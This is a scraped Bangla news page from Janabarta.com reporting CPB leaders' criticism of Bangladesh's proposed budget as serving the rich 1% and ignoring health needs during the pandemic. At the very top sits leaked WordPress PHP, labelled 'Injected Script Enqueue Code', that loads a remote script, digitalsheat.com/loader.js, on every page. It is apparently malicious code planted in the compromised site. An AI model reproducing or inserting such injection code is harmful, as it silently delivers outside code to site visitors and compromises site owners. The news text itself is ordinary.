// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site বাজেট ৯৯% মানুষের স্বার্থবিরোধী: সিপিবি - Janabarta.com

বাজেট ৯৯% মানুষের স্বার্থবিরোধী: সিপিবি

লোগো - বাংলাদেশ কমিউনিস্ট পার্টি (সিপিবি)

নিজস্ব প্রতিবেদক |

করোনাকালে মানুষ বাঁচাতে জন্যস্বাস্থ্য খাতের প্রাধান্য পাওয়ার জন আকাঙ্ক্ষা বাজেট প্রস্তাবে উপেক্ষিত হয়েছে বলে মনে করছে বাংলাদেশের কমিউনিস্ট পার্টি (সিপিবি)। দলটি বলছে, প্রস্তাবিত বাজেট ৯৯ শতাংশ মানুষের স্বার্থবিরোধী, গতানুগতিক, আমলাতান্ত্রিক।

বাজেট প্রস্তাব নিয়ে আজ বৃহস্পতিবার প্রাথমিক প্রতিক্রিয়ায় এমন মন্তব্য করেছেন সিপিবির সভাপতি মুজাহিদুল ইসলাম সেলিম ও সাধারণ সম্পাদক মোহাম্মদ শাহ আলম। এই বাজেটে ১ শতাংশ লুটেরা ধনীকদের স্বার্থ সংরক্ষিত হয়েছে উল্লেখ করে একে গণবিরোধী দলিল আখ্যায়িত করে তা প্রত্যাখান করেন তাঁরা। সিপিবির দুই শীর্ষ নেতা জানান, মানুষের আকাঙ্ক্ষাকে পদদলিত করে আমলাতন্ত্রের সাজানো বাজেট ঘোষণা করা হয়েছে। পরোক্ষ কর নির্ধারণ করা হয়েছে প্রত্যক্ষ করের দ্বিগুণ । এর সবটাই বহন করতে হবে গরিব-মধ্যবিত্তসহ সাধারণ নাগরিকদের। অথচ বিত্তবানদের ওপর ধার্য প্রত্যক্ষ কর কমানো হয়েছে, বিভিন্ন ক্ষেত্রে কর রেয়াত অব্যাহত রাখা হয়েছে, অপ্রদর্শিত কালো টাকা বৈধ করার সুযোগ রাখা হয়েছে। এই বাজেট জাতির অর্থনৈতিক-সামাজিক-রাজনৈতিক পরিমণ্ডলে নৈরাজ্য, অস্থিতিশীলতা ও নাজুকতা বাড়িয়ে তুলবে বলে মনে করেন তাঁরা।